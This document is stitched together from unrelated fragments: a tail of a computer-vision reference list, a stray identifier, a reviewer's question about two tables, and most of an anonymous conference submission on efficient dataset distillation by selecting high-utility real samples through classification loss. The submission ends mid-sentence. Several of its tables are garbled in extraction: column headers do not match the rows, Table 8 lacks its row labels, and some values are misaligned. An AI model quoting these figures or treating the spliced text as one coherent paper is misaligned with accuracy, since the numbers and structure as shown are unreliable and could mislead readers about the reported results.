Depth-supervised nerf: Fewer views and faster training for free. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 12882–12891, 2022. Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. Advances in neural information processing systems, 34:8780–8794, 2021. Ainaz Eftekhari, Alexander Sax, Jitendra Malik, and Amir Zamir. Omnidata: A scalable pipeline for making multi-task mid-level vision datasets from 3d scans. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 10786–10796, 2021. Patrick Esser, Robin Rombach, and Bjorn Ommer. Taming transformers for high-resolution image synthesis. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 12873–12883, 2021. Yuxin Fang, Bencheng Liao, Xinggang Wang, Jiemin Fang, Jiyang Qi, Rui Wu, Jianwei Niu, and Wenyu Liu. You only look at one sequence: Rethinking transformer in vision through object detection. CoRR, abs/2106.00666, 2021. URL https://arxiv.org/abs/2106.00666. Jianglin Fu, Shikai Li, Yuming Jiang, Kwan-Yee Lin, Chen Qian, Chen Change Loy, Wayne Wu, and Ziwei Liu. Stylegan-human: A data-centric odyssey of human generation. In European Conference on Computer Vision, pp. 1–19. Springer, 2022. Ke Gong, Xiaodan Liang, Dongyu Zhang, Xiaohui Shen, and Liang Lin. Look into person: Self-supervised structure-sensitive learning and a new benchmark for human parsing. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 932–940, 2017. Jiaxian Guo, Junnan Li, Dongxu Li, Anthony Tiong, Boyang Li, Dacheng Tao, and Steven HOI. From images to textual prompts: Zero-shot VQA with frozen large language models, 2023. URL https://openreview.net/forum?id=CklUtNvukP8. Xintong Han, Zuxuan Wu, Zhe Wu, Ruichi Yu, and Larry S Davis. Viton: An image-based virtual try-on network. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 7543–7552, 2018.
YNmnGzttMJ
Q3: Tables 1 + 2: There are several instances where the minimal data ratio for higher IPC is lower. Why does this happen, and why for these specific examples (e.g. CAFÉ for CIFAR10 + MNIST, or MTT for CIFAR 10)?
DISTILL GOLD FROM MASSIVE ORES: EFFICIENT DATASET DISTILLATION VIA CRITICAL SAMPLES SELECTION Anonymous authors Paper under double-blind review ABSTRACT Data-efficient learning has drawn significant attention, especially given the current trend of large multi-modal models, where dataset distillation can be an effective solution. However, the dataset distillation process itself is still very inefficient. In this work, we model the distillation problem with reference to information transport. Observing that severe data redundancy exists in dataset distillation, we argue to put more emphasis on the utility of the training samples. We propose a family of methods to exploit the most valuable samples, which is validated by our comprehensive analysis of the optimal data selection. The new strategy significantly reduces the training cost and extends a variety of existing distillation algorithms to larger and more diversified datasets, e.g., in some cases only 0.04% training data is sufficient for comparable distillation performance. Moreover, our strategy consistently enhances the performance, which may open up new analyses on the dynamics of distillation and networks. Our method is able to extend the distillation algorithms to much larger-scale datasets and more heterogeneous datasets, e.g., ImageNet-1K and Kinetics-400. Our code will be made publicly available. 1 INTRODUCTION Data is crucial for deep learning. Data-efficient learning has become critical which enables high performance with less cost, especially in the era of large data and models (Brown et al., 2020; Schuhmann et al., 2021) when the size and complexity of models continue to grow. Techniques such as pruning, quantization, and knowledge distillation have been used to reduce the model size without sacrificing performance. Recently, dataset distillation (Wang et al., 2018) has become a promising way towards data-efficient AI, where a small and condensed dataset (synthetic) is learned from the whole large dataset (real), maintaining the model performance trained on the synthetics. However, the efficiency of dataset distillation itself poses a major obstacle to its own application. Currently, the distillation process takes substantially more time than training a model on the full dataset, which is some kind of “penny-wise and pound-foolish”. For example, the training of expert trajectories for MTT (Cazenavette et al., 2022) takes $100 \times$ longer than training a model on the full real dataset. The prohibitive computation and memory requirement make dataset distillation not applicable as the data scale and instance-per-class (IPC) increase, especially on modern large-scale models and datasets whose size can grow to the order of billions (Brown et al., 2020; Radford et al., 2021; Schuhmann et al., 2021). Existing works address efficient distillation by reducing the storage burden of synthetic data, data compression (Kim et al., 2022b; Liu et al., 2022; Qiu et al., 2022; Deng & Russakovsky, 2022), or optimizing the training workflow (Cui et al., 2022), while no adequate works have addressed the efficiency issue of data utilization. In this paper, we seek a novel efficient strategy to exploit massive real data, by first modeling the dataset distillation problem from the information transport point of view. Specifically, the distillation process can be regarded as a “knowledge” flow from the real dataset to the synthetic dataset, and finally to the network. Since the synthetic data is much smaller compared to the real data, its capacity is limited, and thus the knowledge flow meets a “bottleneck” at the synthetic data. Thus, a natural assumption comes up: we can choose the most valuable real samples (have the most knowledge) Figure 1: Severe data redundancy in dataset distillation. (1) Left: with our optimal selection policy, only 0.04% real samples are sufficient for distillation and 10% optimal real samples outperform the full real dataset. (2) Right: each arrow indicates an algorithm, pointing from the performance on full data to that with our strategy. Our strategy enables the distillation of large-scale heterogeneous datasets and significantly reduces the training cost while maintaining or enhancing the performance. and drop the others without blocking the knowledge flow. The slimmest real data subset can then be obtained encompassing enough knowledge for distillation. Based on this perspective, we observe that real data can be highly redundant and insensitive to data reduction in dataset distillation. For instance, with CIFAR10 for DC (Zhao et al., 2020) and single instance-per-class (IPC=1), randomly removing 90% of the real data does not affect its performance. More importantly, if carefully selected, even 20 images (0.04% of full dataset) suffice for comparable performance. This phenomenon widely exists among various datasets, networks, methods, and IPCs, which we will detail in Sec. 3.1. This observation supports the feasibility of data-efficient distillation that enables us to deal with massive real datasets. We argue that leveraging data redundancy bears more significance for dataset distillation due to the “knowledge bottleneck”. In light of these observations, we provide a thorough analysis and study on data-efficient distillation. We first define the knowledge content of a set of data samples in terms of its data utility, indicating the value or quality of the data. To efficiently and effectively find the optimal real data subset, we propose a family of utility estimation and optimal data selection policies. We compare various criteria to encode the utility of data samples, including data density, gradient, training loss, etc., and derive certain criteria that are shown to be especially effective. Our strategy can greatly reduce the training cost and enable larger-scale experiments with shorter training times. Furthermore, we find that careful data selection can even enhance the distillation sometimes, which indicates that some samples may be “harmful” to the training. With the data utility, we propose a simple but effective baseline tool to exploit the bias toward high-utility samples, to maximize the distillation performance. Our method can achieve stable performance gain without the pre-computation of data utility. With better efficiency, we can handle the whole ImageNet-1K (Deng et al., 2009) and even more heterogeneous data such as videos from Kinetics (Carreira & Zisserman, 2017). Our work is the very first that distills the Kinetics-400 dataset with acceptable efficiency. We provide deeper insight into the internal mechanism of dataset distillation and neural network training. Overall, our contributions are: 1) we propose the first work on analyzing and modeling the data-efficient distillation to greatly reduce the computation complexity; 2) we propose estimators and methods to exploit the data utility to advance dataset distillation; 3) using the proposed methods, we can efficiently distill very large-scale datasets. 2 RELATED WORK Dataset Distillation is a process of compressing a large dataset into a smaller and more representative dataset while maintaining the performance. The existing approaches can be roughly classified into: 1) Meta-Model Matching maintains the transferability of the synthetic data, by optimizing the empirical loss on the original dataset of models trained on the synthetic data. Wang et al. (2018) first propose the task of data distillation and use the meta-model matching framework for optimization. Nguyen et al. (2020) exploit kernel ridge regression to facilitate its inner optimization loop, and is further extended to infinite wide networks (Nguyen et al., 2021). Zhou et al. (2022) separate the optimization of synthetic data/classifier and feature extractor. 2) Gradient Matching (Zhao et al., 2020) aligns the gradients of the synthetic and real dataset and is further improved by Zhao & Bilen (2021) to perform the same image augmentations on both the real and synthetic data. 3) Distribution Matching (Zhao & Bilen, 2023) matches the feature distributions of the synthetic and real data, which is simple but effective. Wang et al. (2022) design layer-wise feature alignment and a few early exit conditions to promote DM. Zhao et al. (2023) further enhance DM with regularizers and model pool. 4) Trajectory Matching: Cazenavette et al. (2022) propose to match the training trajectory of the model parameters, by aligning the future parameters trained on real data and synthetic data. Cui et al. (2022) reduce the memory consumption of MTT and exploit label learning. 5) Factorization of synthetic data can reduce the storage burden and share knowledge among instances. Kim et al. (2022b) use a strategy of putting multiple images on one synthetic sample. Deng & Russakovsky (2022) decompose the synthetic data to the linear combination of bases. Liu et al. (2022) use a hallucination network to combine the bases. Lee et al. (2022) maintains a smaller base space to further reduce the storage. 6) Bayesian Pseudocoreset is a family of algorithms that learn the synthetic data with Bayesian inference (Manousakas et al., 2020; Kim et al., 2022a; Tiwary et al., 2023). Data Selection/Pruning reduces the training data without significantly affecting performance. Classic data selection often calculates a scalar utility score for each sample based on predefined criteria (Castro et al., 2018; Sener & Savarese, 2017; Toneva et al., 2018) and filters the samples based on scores. Some data pruning methods also consider the interaction between samples. Yang et al. (2022) examines generalization influence to reduce training data, which aims to identify the smallest subset to satisfy the expected generalization ability. In comparison, data distillation (Wang et al., 2018) and data condensation (Zhao et al., 2020) synthesize new and smaller data. The performance of data distillation with the same images per class (IPC) significantly outperforms data pruning. 3 PRELIMINARIES Data redundancy widely exists in various machine learning tasks. After conducting thorough experiments and comparisons, we first argue that data redundancy is extremely severe in distillation (Sec. 3.1). Then, we model the dynamics of dataset distillation to explain our observations (Sec. 3.2). 3.1 DATA REDUNDANCY IN DATASET DISTILLATION Dataset distillation learns a small synthetic dataset from the larger real dataset. To support the general observation that a real dataset is redundant for the distillation task, we first conduct an ablation study on real datasets by randomly removing a portion of real data before the distillation process. We show an example in Fig. 2 on CIFAR10 with DC (Zhao et al., 2020) algorithm and IPC=1. After randomly dropping real data, the distillation performance remains stable until the drop rate is over 90%. With some other selection criteria (e.g., the classification loss value of each sample), the dropping rate can be further increased to 99.96%, i.e., 20 samples are sufficient for comparable accuracy. Removing some samples even enhances the distillation accuracy. This simple experiment indicates that real data can be extremely redundant for dataset distillation, where some samples may be even “harmful”. For further discussion, we first introduce key definitions pertinent to critical samples: Definition 1. Given a real dataset \( D \) with size \( m \), for a data selection policy \( \pi \), we say \( \Gamma(\pi) \in \mathbb{N} \) is the critical sample size if \( \Gamma(\pi) \) is the minimal size s.t. the \( \Gamma(\pi) \) samples in \( D \) selected by the policy \( \pi \) is weakly \( \epsilon \)-close to the full dataset \( D \). The critical sample ratio \( \gamma(\pi) = \Gamma(\pi)/m \). Here we borrow the definition of \( \epsilon \)-close (Nguyen et al., 2020): two datasets are weakly \( \epsilon \)-close if the models trained on each dataset are close in terms of the empirical loss value. We use the 0-1 loss... Table 1: Comparison of $\gamma(\text{rand})$ among datasets, distillation algorithms, and synthetic data sizes, i.e., the minimal data ratio for comparable distillation accuracy. | Dataset | CIFAR10 | CIFAR100 | SVHN | MNIST | TinyImageNet | |---------|---------|----------|------|-------|--------------| | IPC | 1 | 10 | 50 | 1 | 10 | | DC | 10% | 30% | 50% | 50% | 40% | | DSA | 15% | 30% | 30% | 60% | 40% | | DM | 15% | 40% | 50% | 30% | 15% | | MTT | 40% | 90% | 80% | 80% | 90% | Table 2: $\gamma(\text{rand})$ on more distillation algorithms. | Dataset | IPC | CAFE | LinBa | IDC | |---------|-----|------|-------|-----| | CIFAR10 | 1 | 15% | 70% | 50% | | | 10 | 11% | 30% | 10% | | SVHN | 1 | 30% | 50% | 60% | | | 10 | 60% | 60% | 30% | | MNIST | 1 | 10% | 30% | 0.5%| | | 10 | 1% | 40% | 40% | Table 3: $\gamma(\text{rand})$ among various inits on CIFAR10. | IPC | Init | DC | DM | |-----|------|----|----| | 1 | noise| 10%| 10%| | | real | 10%| 15%| | | herd | 10%| 15%| | 10 | noise| 30%| 30%| | | real | 30%| 40%| | | herd | 30%| 30%| Table 4: $\gamma(\text{rand})$ among various networks on CIFAR10. | IPC | Net | DC | DM | |-----|-----|----|----| | Conv| 10% | 15%| | | MLP | 3% | 5% | | | ResNet| 5% | 15%| | | VGG | 10% | 5% | | | AlexNet| 5% | 5% | | | Conv| 30% | 40%| | | MLP | 40% | 40%| | function in the following discussion, so two datasets are weakly $\epsilon$-close means the models trained on them have similar distillation accuracy. Therefore, the critical sample ratio is the minimal data ratio that can preserve the overall distillation performance with respect to a certain data selection policy, e.g., the experiment in Fig. 2 indicates $\gamma(\pi) = 0.1$ when $\pi =$ random. A smaller critical sample ratio indicates more redundancy in the given real dataset and we have more freedom to prune the data. Note that $\gamma(\pi)$ may vary among different real and synthetic dataset settings and distillation algorithm settings. Then we conduct more comprehensive comparison experiments on various datasets (Krizhevsky et al., 2009; Netzer et al., 2011; LeCun et al., 1998; Le & Yang, 2015), networks, distillation algorithms (Zhao et al., 2020; Zhao & Bilen, 2021, 2023; Cazenavette et al., 2022; Wang et al., 2022; Deng & Russakovsky, 2022; Kim et al., 2022b), initialization methods, and synthetic data sizes (represented by instance-per-class, IPC). We randomly drop some portions of the real data to find their critical sample ratio under random data selection ($\gamma(\text{rand})$). We take the mean and standard deviation of the accuracy of 5 random removal trials. We use the default parameters of each method, which are detailed in Appendix Sec. F. The results are shown in Tab. 1, 2, 3, 4, which show that severe data redundancy widely exists in various dataset distillation settings. Some experiments on TinyImageNet at high IPC are not reported (marked with “–”) due to its high computation cost and MTT exceeds our GPU memory limit. In most datasets and algorithms, less than 30% samples are sufficient for dataset distillation. We also observe some basic patterns: 1. Larger synthetic data size leads to a larger critical sample ratio. 2. Better distillation algorithms have larger critical sample ratios, e.g., MTT performs better than DC and has larger critical sample ratios. 3. Initialization and architecture have only a minor influence on the critical sample ratio. These observations indicate that we can only use a small subset of real data samples to reduce the training cost and to enable the optimization of the dataset distillation workflow from the aspect of real data utilization. Consequently, the goal of data-efficient distillation is how to find the optimal data selection policy $\pi$ to minimize the critical sample ratio $\gamma(\pi)$, or formally define: **Definition 2.** A data selection policy is an optimal selection $\pi^*$ iff: $\pi^* = \arg\min_\pi \gamma(\pi)$. ### 3.2 The Information Transport Perspective of Dataset Distillation To support the analysis of optimal data selection policy $\pi^*$, we first revisit the dataset distillation inspired by the information theory. The dataset distillation workflow can be regarded as the transport of “knowledge” from real data to synthetic data and, finally, to the classification model during training. We informally define the “knowledge” contained in a set of data samples $D$ as their utility, denoted as $U(D)$. The samples with larger utility are more valuable for the learning. Figure 3: Data utility. The small capacity of synthetic data leads to a “bottleneck” of utility (right top). Thus, we seek an optimal selection policy that reduces real data while maintaining sufficient data utility, hence preserving or even enhancing the distillation performance. The right bottom figure shows the mean-field view of dataset utility and the corresponding greedy data selection strategy. During the training process, the utility capacity of the classification model is limited, with the full data usually exceeding the capacity of the model. This gives rise to the popular data selection and distillation methods as minor data reduction will not degrade model performance. When we further consider the distillation step, the capacity of synthetic data is also limited and far smaller than that of full data. The size of synthetic data is often less than 1% of the whole dataset. Hence the utility flow from real data to synthetic data to the classification model forms a “bottleneck” structure, as shown in Fig. 3. In this case, dataset distillation has much more potential for data selection and data curation, and it is feasible and critical to analyze the critical samples in the dataset. We denote the maximum utility that synthetic data can learn as $U_{syn}$. Once the real data utility exceeds $U_{syn}$, the distillation performance is maintained. Thus, we can define the optimal selection policy more specifically (card(·) measures the cardinality of a set): **Definition 3.** Optimal data selection is to find $\mathcal{X}^* = \arg\min_{\mathcal{X} \subset D} \text{card}(\mathcal{X}), \ s.t. \ U(\mathcal{X}) \geq U_{syn}$. The modeling of dataset distillation also explains the rules in the previous ablation experiments: 1. A Larger synthetic set has larger $U_{syn}$, so more data are required to fill the utility capacity. 2. The synthetic data can receive more “knowledge” when using a superior distillation algorithm, i.e., $U_{syn}$ is increased, so the critical sample ratio is increased. 3. The network architecture and initialization methods affect neither samples’ utility nor $U_{syn}$, so they have a minor contribution to the critical sample ratio. ### 4 Estimating Data Utility #### 4.1 Mean-field View of Data Utility However, the above optimal selection is intractable and hard to optimize. To address our problem, we borrow the idea of mean-field theory from physics, which has been widely adopted in machine learning fields [Ranganath et al., 2014]. Mean-field theory is a mathematical approach to understanding the behavior of large and complex systems with many interacting parts. The theory simplifies a complex system by assuming that each part of the system is only influenced by the average behavior of the other parts so that individual parts can be approximated by simpler independent systems. In the case of data utility, we apply a mean-field approximation to decompose the utility of a set of data $U(D)$ into the combination of the utility of individuals $u(x_i)$: $$U(D) = U(\{x_1, x_2, \cdots, x_m\}) = u(x_1) + u(x_2) + \cdots + u(x_m).$$ \hspace{1cm} (1) Although the approximation omits the high-order interaction of utility between multiple samples, the mean-field family of $U(D)$ can greatly simplify the optimal selection policy: we can greedily select samples with the largest utility value until the total utility exceeds $U_{syn}$ (Fig. 3). In the following sections, we will provide a comprehensive study of various indicators that are correlated with and can reflect the utility of data samples. These indicators will be employed in the data selection policy. More complex factors involving high-order interaction will be discussed in Sec. 4.4. ### 4.2 Mean-field Indicators of Data Utility In this section, we present the data utility indicators under the mean-field view, i.e., each sample is assigned a scalar that is positively related to its utility, followed by a thorough empirical comparison. #### a) Heuristic Indicators. We first describe some heuristic data utility indicators, which reflect the data distribution and their training properties. The implementations are available in Appendix Sec. F.4. 1. **Classification Loss** indicates the learning difficulty of samples and distinguishes hard and easy cases. We train the classification model for 50~100 epochs for 50 experiment trials and take the average loss value of the last 10 epochs. 2. **Data density** around a sample depicts its scarcity and uniqueness. We first train the feature extractor on the dataset and extract its feature vectors. For each sample, we compute the mean distance to its K-nearest-neighbors in the same class. A negative sign is put for a density estimator. 3. **Distance to the cluster center**. Similar to (Liu et al., 2023), we adopt K-Means to explore the sub-cluster structure for each class. For each sample, we compute its distance to the nearest cluster center. The sub-cluster number is set to 128 by default. 4. **Distance to the initial image**. The utility of real samples may differ due to the initialization of synthetic data, e.g., the initial images for real initialization may have less value since they are already the synthetic data themselves. We measure the L2 distance of each sample to the initial synthetic data with the same feature extractors in the density estimation. #### b) Monte-Carlo Indicator. More directly, we propose a Monte-Carlo method to estimate the sample utility from the distillation accuracy. In the analysis in Sec. 3.2, we argue that if the data utility $U(\mathcal{X})$ is less than the capacity $U_{syn}$, the performance will drop. That is, if the data utility is small, the distillation accuracy can reflect the utility value and is an ultimate indicator of utility. Thus, we can estimate the sample utility with a randomized algorithm. We first select a data size $M$ which is less than $\Gamma(\text{rand})$ to ensure $U(\mathcal{X}) < U_{syn}$. We repeat multiple trials (1000 trials by default) of random sampling a subset $\mathcal{X}_j$ with size $M$ from the real dataset and use the distillation accuracy $s_j$ as an indicator of the utility $U(\mathcal{X}_j)$. If the $i^{th}$ sample $x_i$ is visited in $T$ trials, its utility can be estimated as the average accuracy of these trials (Eq. 2). Considering both the mean-field assumption and the law of large numbers, the indicator is linear to the intrinsic sample utility $u(x_i)$ when $T$ is large: $$\tilde{u}(x_i) = \frac{1}{T} \sum_{j: \mathcal{X}_j \ni x_i} s_j = \frac{1}{T} \sum_{j: \mathcal{X}_j \ni x_i} U(\mathcal{X}_j) \overset{T \to \infty}{\longrightarrow} \frac{N - M}{N - 1} u(x_i) + \frac{(M - 1)N}{N - 1} E(u(x)),$$ since the second term is a constant and $(N - M)/(N - 1) > 0$. We prove Eq. 2 in the appendix. #### Comparison of Utility Indicators. We compare the above utility indicators via two metrics. Appendix Sec. B gives the full experiment results and extra comparison to coreset selection algorithms. **I. Stratified analysis of utility.** We sorted the samples by their utility and split the dataset into a few subgroups. Their utility values are monotonously increasing. By conducting distillation on each group, we can evaluate whether the utility indicator induces an ideal total ordering for samples. First, we identify the direction or “polarity” of the indicators based on the results, e.g., which samples have larger utility, those with a larger or smaller loss value. We find that the samples with larger utility are those with 1) small loss value, 2) large density, 3) closer to cluster centers, 4) closer to initialization samples, or 5) larger Monte-Carlo utility. This indicates the distillation prefers common samples that are easier to learn rather than corner cases and outliers, which is consistent with our model in Sec. 3.2 due to the small capacity of synthetic data, the algorithms tend to learn the easy samples and common patterns of the real dataset. Second, we compare the proposed indicators. Most indicators can correctly distinguish the samples with high or low utility, except the density and initialization distance which cannot accurately find the large utility samples. The loss value and Monte-Carlo estimator are significantly superior to the rest since they have a better discriminating ability on both high and low-utility samples. **II. Critical sample ratio comparison.** We use the utility estimation to greedily select samples, and compare their critical sample ratio $\gamma(\pi)$ in various settings. Among the utility indicators, classifi- Table 5: Comparison of $\gamma(loss)$ among datasets, distillation algorithms, and synthetic data sizes, i.e., the minimal data ratio for comparable distillation accuracy. | Dataset | CIFAR10 | CIFAR100 | SVHN | TinyImageNet | |---------|---------|----------|------|--------------| | IPC | 1 | 10 | 50 | 1 | | DC | 0.5% | 70% | 30% | 5% | | DSA | 0.5% | 40% | 15% | 3% | | DM | 0.5% | 50% | 60% | 0.5% | | MTT | 40% | 80% | 80% | 40% | Table 6: Comparison of $\gamma(loss)$ on more distillation algorithms. | Dataset | IPC | CAFE | LinBa | IDC | |---------|-----|------|-------|-----| | CIFAR10 | 1 | 0.2% | 40% | 15% | | | 10 | 11% | 20% | 5% | | SVHN | 1 | 40% | 80% | 70% | | | 10 | 1% | 70% | 80% | Figure 4: The comparison of $\gamma(rand)$ and $\gamma(loss)$: the arrows point from $\gamma(rand)$ to $\gamma(loss)$. Green: selection by loss is superior; Red: selection by loss is inferior to random. Categorization loss and the Monte-Carlo method significantly reduce the critical sample ratio to lower than 1%, i.e., the samples selected by them are more critical for dataset distillation. Despite their comparable performance, the Monte-Carlo method is far more inefficient and less applicable due to its slow convergence: e.g., for CIFAR10, we distill from 5% of the real data 1000 times, which takes over 100x the time of distillation itself. Thus, we argue that the loss value is the most effective and efficient data utility indicator, which will be utilized and discussed in the following sections. Among the other criteria, the data density and clustering methods also perform above random selection, though inferior to loss and Monte Carlo, showing that data distribution clues also help find valuable samples. Whilst, the initialization distance does not give a meaningful sample ordering. 4.3 Extended Discussion on The Loss Indicator Considering both the performance and the computation complexity, the loss value is a better estimator for data utility. Thus we propose to use a loss utility indicator in the greedy selection method. We conducted an in-depth study on loss value and have the following observations. Dropping by loss consistently outperforms random selection. We extend the experiments of critical sample ratio $\gamma(loss)$ with loss utility indicator on 4 datasets, 7 algorithms, and 3 IPC settings as shown in Tab. 5 and 6. Experiments on more SOTA algorithms can be found in Appendix Sec. B.3. We also show the comparison between random selection and selection with loss in Fig. 4. The greedy selection with loss consistently outperforms random selection. In most cases, the critical sample ratios are < 10%, significantly reducing the training cost. We also find dropping data does not drop the transferability in Appendix Sec. D. Dropping by loss can enhance distillation. Surprisingly, we also observe that dropping real data can improve performance. We show the best performance during data dropping in Tab. 7 on DC, DSA, DM, and MTT. In almost all cases, the data selection can notably promote distillation accuracy. This may imply some samples have negative utility that are detrimental to distillation. With accurate utility estimation, greedy selection can cancel these negative impacts. This observation inspires new approaches that leverage the data utility and exploit all data samples in different quality, enabling future analysis of network dynamics and dataset distillation. Appendix Secs. B.3 and C show more support for SOTA methods and an explanation from the variance/outlier perspective. Early epoch loss in very few trials is also accurate for selection. The twig is bent, and so is the tree inclined. We find that the loss values in very early classification epochs are informative enough for data selection, probably as the early dynamics of samples can reflect their training difficulty and importance. Moreover, the number of trials to obtain loss values has little influence on the selection performance, as shown by the empirical results on CIFAR10, IPC=1, and DC. We take the average loss curves of 1, 5, 10, and 50 trials of classification, and take the mean loss value for the first 1, 5, 10, and 100 epochs when the training converges at around 100 epochs. In Fig. 5, we use the same stratification method as Sec. 4.1 to evaluate the sample ordering induced by the loss values. Table 7: Best performance w/ data dropping. The performance difference between the full dataset and x% of real data are shown in parentheses (†: compare to our reproduced accuracy). | Dataset | IPC | DC | DSA | DM | MTT | |-------------|-----|------|------|------|------| | CIFAR10 | 1 | 30.0±0.1 (+17.5%) | 30.9±0.1 (+26.20%) | 29.7±0.3 (+37.5%) | 46.3±0.8 (+0.2, 80%) | | | 10 | 44.9±0.4 (+0.0, 70%) | 52.4±0.2 (+0.2, 50%) | 50.0±0.2 (+1.1, 50%) | 65.7±0.3 (+0.4, 90%) | | | 50 | 54.9±0.5 (+1.0, 60%) | 61.5±0.7 (+0.9, 20%) | 63.4±0.2 (+0.4, 60%) | 72.0±0.4 (+0.4, 95%) | | CIFAR100 | 1 | 14.1±0.1 (+1.3, 20%) | 15.6±0.1 (+1.7, 20%) | 14.9±0.5 (+3.5, 10%) | 24.6±0.0 (+0.3, 90%) | | | 10 | 26.5±0.3 (+1.3, 30%) | 32.5±0.4 (+0.2, 30%) | 32.4±0.3 (+2.7, 50%) | 40.1±0.5 (+0.0, 80%) | | SVHN | 1 | 32.2±0.5 (+1.0, 20%) | 28.9±1.3 (+0.1, 40%) | 29.8±0.5 (+6.3, 20%) | 43.0±1.1 (+3.2, 10%) | | | 10 | 76.2±0.6 (+0.1, 40%) | 80.0±0.8 (+0.8, 70%) | 74.6±0.3 (+0.9, 30%) | 78.1±0.5 (+0.9, 20%) | | TinyImageNet| 1 | 4.9±0.1 (+0.2†, 30%) | 4.3±0.0 (+0.6†, 5%) | 4.8±0.1 (+0.9, 10%) | 9.0±0.4 (+0.2, 10%) | | | 10 | 12.8±0.0 (+0.2†, 20%) | - | 17.5±0.1 (+4.6, 30%) | - | Figure 5: Stratified distillation performance of different classification trials and epochs numbers. An ideal stratification yields a monotonously increasing performance curve. (Appendix Fig.7 for the full figure). Tab.8 lists the corresponding critical sample ratios. Most loss values produce a good stratification and thus have very small γ, the best of which decrease γ to 0.04%, i.e., 2 samples per class are enough for comparable performance with this selection criterion. Even in some extreme settings, e.g., 5 trials of 1 epoch training, they are sufficient for an informative loss value. Only extreme cases such as 1 epoch and 1 trial show degradation. The two observations can be utilized to substantially reduce the computational burden of generating loss values, which now can be ignored or naturally embedded in the distillation process itself, extending our paradigm to broader applications. 4.4 Higher-order Interaction of Data Utility In Sec.4.1 we leverage mean-field approximation to simplify the data utility. The experiments and discussion above also justify this simplification. However, the high-order information and interactions between samples do exist, and in some extreme scenarios, these interactions are not ignorable. For example, data diversity is a higher-order data utility indicator since it is a property of the population rather than an individual. We observe diversity affects data distillation. The data utility paradigm always performs poorly on the MNIST dataset. We conduct stratified experiments on MNIST with loss value indicator and observe that both the subgroups with large loss ($S_{10}$) and small loss ($S_{1}$) have lower accuracy, which is due to the diversity vanishing in the small loss subgroups. We use the quotient of intraclass variance and interclass variance as the diversity metric (a large value indicates larger diversity). As shown in Fig.6 only MNIST severely drops the diversity for the subgroups with a small loss. This phenomenon also exists in other utility indicators such as data density, which spoils the data utility paradigm. This phenomenon reflects the impact of high-order interaction of data utility. It can be challenging to incorporate diversity into consideration without sacrificing the efficiency in our paradigm (e.g., leveraging annealing or Monte-Carlo algorithms) so we leave it to future work. In-depth discussion and modeling of high-order data utility involve complex systems which is beyond our scope. It is worth noting that the impact of diversity vanishing can be negligible in most realistic scenarios (e.g., CIFAR), especially for large-scale datasets due to their large overall diversity. We provide the stratified visualization in Appendix Sec.G.2.2. Table 8: Comparison of γ(loss) of difference classification trial and epochs. | Trial Number | 1 Epoch | 5 Epochs | 10 Epochs | 100 Epochs | |--------------|---------|----------|-----------|------------| | | 10% | 0.3% | 0.2% | 0.1% | | | 0.2% | 0.04% | 0.1% | 0.1% | | | 0.2% | 0.04% | 0.04% | 0.04% | | | 0.2% | 0.1% | 0.2% | 0.1% | Table 9: Performance of state-of-the-art and our runtime pruning approach (†: reproduced accuracy). | Dataset | IPC | DSA | DM | MTT | DC | IDC | DC+Ours | IDC+Ours | Full dataset | |-----------|-----|-----|----|-----|----|-----|---------|----------|--------------| | CIFAR10 | 1 | 28.8±0.7 | 26.0±0.8 | 46.3±0.8 | 28.3±0.5 | 55.3±0.3† | 29.3±0.1 | 56.1±0.3 | 84.8±0.1 | | | 10 | 52.1±0.5 | 49.9±0.6 | 65.6±0.7 | 44.9±0.5 | 65.0±0.5† | 45.1±0.4 | 65.3±0.1 | | | CIFAR100 | 1 | 13.9±0.3 | 11.4±0.3 | 24.3±0.3 | 12.8±0.3 | 31.3±0.2† | 13.2±0.4 | 32.1±0.2 | 56.2±0.3 | | | 10 | 32.3±0.3 | 29.7±0.3 | 40.1±0.4 | 25.2±0.3 | 40.8±0.3† | 25.9±0.5 | 41.3±0.4 | | | SVHN | 1 | 27.5±1.4 | - | - | 31.2±1.4 | 68.7±0.6† | 31.7±0.7 | 70.0±0.7 | 95.4±0.1 | | | 10 | 79.2±0.5 | - | - | 76.1±0.6 | 82.7±0.6† | 76.6±0.4 | 83.0±0.2 | | Table 10: Dataset distillation on large-scale image and video datasets (est. = estimated). | Dataset | IPC | Algorithm | Distill Full Data Accuracy | Training Time | Distill with Selection (Ours) Accuracy | Training Time | Random Real | |---------------|-----|-----------|----------------------------|---------------|----------------------------------------|---------------|------------| | ImageNet-1K | 1 | DC | 1.79±0.04 | 23.6h | 1.93±0.06 | 17.2h | 0.43±0.02 | | | | DM | 1.58±0.11 | 22.4h | 1.82±0.14 | 9.8h | | | | | MTT | 205.0h (est.) | | 1.97±0.04 | 31.0h | | | | 10 | DM | 3.86±0.16 | 24.7h | 5.11±0.08 | 15.1h | 1.57±0.21 | | Kinetics-400 | 50 | DM | 8.22±0.86 | 35.0h | 9.23±0.40 | 20.4h | 5.29±0.70 | | (300K videos) | | | | | | | | | | 1 | DM | 2.78±0.14 | 37.3h | 2.88±0.12 | 29.4h | 0.90±0.23 | | | | MTT | - | 460.8h (est.) | 2.69±0.17 | 76.6h | | | | 10 | DM | 9.48±0.15 | 43.5h | 9.56±0.08 | 32.1h | 3.33±0.43 | 5 Harnessing Data Utility 5.1 A Simple Case to Extend Gradient Matching Methods Based on the data utility, we propose a baseline to leverage utility during run time, i.e., no pre-computing of data utility. We present a simple but effective plug-and-play mechanism for gradient-matching-based methods with only 3 lines extra code (Appendix Sec. E), to exploit the bias towards small values: dropping the samples with larger losses in each batch. Since the loss has been computed during gradient matching, the strategy brings no computational overhead. Rather, it reduces the samples hence reducing the backpropagation time. We apply this approach to DC and IDC (Kim et al., 2022b). The default pruning rate is 30% (Appendix Sec. F for details). Shown in Tab. 9, our simple strategy can significantly enhance the current distillation algorithms by 1% with efficiency. This experiment shows the feasibility of embedding the data utility mechanism into the current distillation paradigm to boost performance. The data utility exhibits great potential for practical applications and is promising for future extensions. 5.2 Efficient Distillation of Large-scale Datasets With our data utility paradigm, the existing algorithms can be efficiently extended to larger-scale and more heterogeneous datasets. We apply the data utility selection to the distillation of ImageNet-1K (Deng et al., 2009) and scale up to IPC=50, and for the very first time, we distill large-scale video dataset Kinetics-400 (Carreira & Zisserman, 2017) (detailed in Appendix Sec. F). The results are listed in Tab. 10. Most methods struggle with high IPC due to demanding GRAM, except DM which allows class-separate training. MTT is 